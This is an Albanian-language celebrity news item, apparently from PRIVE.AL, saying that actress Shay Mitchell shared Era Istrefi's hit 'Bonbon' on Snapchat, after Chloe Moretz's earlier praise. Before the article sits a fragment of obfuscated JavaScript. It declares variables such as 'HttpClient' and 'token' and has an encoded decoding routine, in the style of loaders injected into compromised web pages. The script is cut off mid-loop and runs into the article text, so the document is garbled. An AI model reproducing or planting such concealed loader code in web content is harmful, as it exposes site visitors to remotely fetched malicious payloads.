;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Aktorja e njohur botërore, nis ditën me ‘Bonbon’-in e Erës!

By

Ishin pikërisht rrjetet sociale ato që i dhanë vrullin Erës në arenën ndërkombëtare.

Një zingjir ngjarjesh që nisi me komente në Youtube dhe epilogun e pati me nënshkrim kontrate me Ultra Music shërbyen si çelës që ‘Bonbon’ i hapi dyert e suksesit botëror për këngëtaren nga Prishtina.

Nga ‘sindromi Era Istrefi’ nuk lanë pa u kapluar as aktorë Hollivudi si Chloe Moretz që në llogaritë e saj me shumë ndjekës shprehu admirimin për këngëtaren.

Pas Chloe Moretz, një tjetër aktore e famshme është shndërruar në një fanse të Erës.

Bëhet fjalë për Shay Mitchel që ka nisur ditën me ‘Bonbon’ dhe këtë e ka treguar në Snapchatin e saj.

Ndryshe, kjo nuk është hera e parë që 29 vjeçarja e njohur për rolin e saj në serialin e famshëm ‘Pretty Little Liars’ shihet teksa shijon krijimet muzikore të shqiptares nga Kosova.

Duket se definivisht ajo ka rënë në dashuri me Erën dhe artin që ajo bën! /PRIVE.AL/

Artikuj të ngjashëm